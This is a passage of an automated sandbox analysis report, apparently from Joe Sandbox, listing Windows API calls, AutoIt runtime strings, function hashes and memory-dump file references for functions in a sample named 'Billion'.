                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 539ec1f63a475e907867d516fd21641ac3bfdfa2ad9828eeb8f293d91789afda
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5811B431904115BBCF24ABB0EC4AEEE7BACDF51715F0100B9F915A6091EF74DAC586A1
                                                                                                                                                                                                                                                                                                          Function 0019F437 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0019F447
                                                                                                                                                                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0019F45D
                                                                                                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0019F46C
                                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{_,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0019F47B
                                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0019F485
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0019F48C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • ________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{_, xrefs: 0019F476
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                                          • String ID: ________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{_
                                                                                                                                                                                                                                                                                                          • API String ID: 839392675-1455413529
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1e46091a62f0379ee7185c5cd8da91b4f3ac1645cef6df30346123f615bc3403
                                                                                                                                                                                                                                                                                                          • Instruction ID: d10ebdc8be82f8f7002de74cff239214ab2b1fb2c69c3940b1394e88888e8ae6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e46091a62f0379ee7185c5cd8da91b4f3ac1645cef6df30346123f615bc3403
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97F05472241198BBE7215752AC0EEEF7F7CEFC6B11F040068F601D1590D7A49A82C6B5
                                                                                                                                                                                                                                                                                                          Function 0019F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: a397c4ee878c4ee708b446e3efd76d2fce27dd118fa9bb3d41891c75939e60eb
                                                                                                                                                                                                                                                                                                          • Instruction ID: b17f3b4bc97f7fc2bb5cbaebec1a01e08780102229f29aa03917a563fda5acfc
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a397c4ee878c4ee708b446e3efd76d2fce27dd118fa9bb3d41891c75939e60eb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3541C865C10114FACB11EBF8CC86ADFB768AF15311F904466E928E7121FB34D25AC3E6
                                                                                                                                                                                                                                                                                                          Function 001C379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001C37B7
                                                                                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 001C37BF
                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001C37CA
                                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 001C37D6
                                                                                                                                                                                                                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001C3812
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001C3823
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,001C6504,?,?,000000FF,00000000,?,000000FF,?), ref: 001C385E
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001C387D
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7440f5e8e4e10874b4ecbf84e50064101a72ff6036f3f2a6960e1702eb1628bb
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3af302bd930c98bbed0ad71eb6f1e45e8bccac40f4923c3297377af558c21736
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7440f5e8e4e10874b4ecbf84e50064101a72ff6036f3f2a6960e1702eb1628bb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06319C72201214BFEB158F54EC89FEB3FA9EF59715F044069FE089A291C6B5DC91CBA0
                                                                                                                                                                                                                                                                                                          Function 001B5A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                                          • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                                          • Opcode ID: b608e907969d4998866abc90cdf8a0883c661ddcde78dcc8622771035e648b4b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8a002dcf9baf5408e89e9d6886ebc87f8c4be6ff02a90d3a8c399bf6801a7fbc
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b608e907969d4998866abc90cdf8a0883c661ddcde78dcc8622771035e648b4b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72D19E71A0060A9FDF14CFA8C885BEEB7B6FF48304F158569E915AB281E770ED45CB50
                                                                                                                                                                                                                                                                                                          Function 001718A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00171B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0017194E
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00171B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 001719D1
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00171B7B,?,00171B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00171A64
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00171B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00171A7B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00163B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00156A79,?,0000015D,?,?,?,?,001585B0,000000FF,00000000,?,?), ref: 00163BC5
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00171B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00171AF7
                                                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00171B22
                                                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00171B2E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f27166ee106ef373478ef5a4f7e994992b31f473c7c6d374b15fec007a6c646d
                                                                                                                                                                                                                                                                                                          • Instruction ID: d9ca82fb84af23f30a9da8ca81caef8a86ed27ba3afb7fb24332d15b848f4c62
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f27166ee106ef373478ef5a4f7e994992b31f473c7c6d374b15fec007a6c646d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9091D472E00216BBDB248EACCC91EEEBBB5EF19714F198129E909E7180E734DD41C760
                                                                                                                                                                                                                                                                                                          Function 001B4F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                                          • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                                          • Opcode ID: f51843c0d44d3d8b79976feab8a1b954f67155e318729fe0fe4d869edfc6222b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 10f51a3e6fcaf042568587d3c615b4f60285fa1f286a561bbc86853965244cfb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f51843c0d44d3d8b79976feab8a1b954f67155e318729fe0fe4d869edfc6222b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7919A71A00619ABDF24DFA5C888FEEBBB9AF49314F108559F505AB280D7709941CFA0
                                                                                                                                                                                                                                                                                                          Function 001B43A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 001B43C8
                                                                                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 001B44D7
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001B44E7
                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001B467C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001A169E: VariantInit.OLEAUT32(00000000), ref: 001A16DE
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001A169E: VariantCopy.OLEAUT32(?,?), ref: 001A16E7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001A169E: VariantClear.OLEAUT32(?), ref: 001A16F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                                          • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                                          • Opcode ID: f4b5596d6b6b6aa1fbc655036723b1e07f945ac796c9beffaf32e889792a3f4e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 450c2e5ddc7c98c487d03a0723aecd32f9be5fcc0d2702fd65a001a44f8dd532
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4b5596d6b6b6aa1fbc655036723b1e07f945ac796c9beffaf32e889792a3f4e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81918A746083019FCB14EF24C4809AAB7E5FF99714F14892DF88A9B352DB31ED06CB92
                                                                                                                                                                                                                                                                                                          Function 001B560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001908FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?,?,?,00190C4E), ref: 0019091B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001908FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?,?), ref: 00190936
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001908FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?,?), ref: 00190944
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001908FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?), ref: 00190954
                                                                                                                                                                                                                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 001B56AE
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001B57B6
                                                                                                                                                                                                                                                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 001B582C
                                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 001B5837
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                                          • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0633dc3b40212d63ccd02d2986813b1474077ca81d24896001e1dfea8fa2b7d8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 394694ce61c858716b0b6ade5c2b24cd4a6fafa6032ea6039e34a05dc8c761d6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0633dc3b40212d63ccd02d2986813b1474077ca81d24896001e1dfea8fa2b7d8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19910471D00219EFDF14DFA4D881EEEBBB9BF18304F10456AE915AB251EB709A44CFA0
                                                                                                                                                                                                                                                                                                          Function 001C2B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetMenu.USER32(?), ref: 001C2C1F
                                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 001C2C51
                                                                                                                                                                                                                                                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001C2C79
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C2CAF
                                                                                                                                                                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 001C2CE9
                                                                                                                                                                                                                                                                                                          • GetSubMenu.USER32(?,?), ref: 001C2CF7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: GetWindowThreadProcessId.USER32(?,00000000), ref: 001943AD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: GetCurrentThreadId.KERNEL32 ref: 001943B4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00192F00), ref: 001943BB
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001C2D7F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019F292: Sleep.KERNEL32 ref: 0019F30A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c763b380aa67dc2d0027bfb53855455ed458cd381808d0a2b3cd68e14beea962
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3b6605695e5f3fb2c69818ca5e9de571206c4f77f743a107a0575838167abd64
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c763b380aa67dc2d0027bfb53855455ed458cd381808d0a2b3cd68e14beea962
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29716D75A00215AFCB15EFA4C845FAEBBF1EF68310F15846DE816AB351DB34EE418B90
                                                                                                                                                                                                                                                                                                          Function 0019B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 0019B8C0
                                                                                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0019B8D5
                                                                                                                                                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 0019B936
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 0019B964
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0019B983
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 0019B9C4
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0019B9E7
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
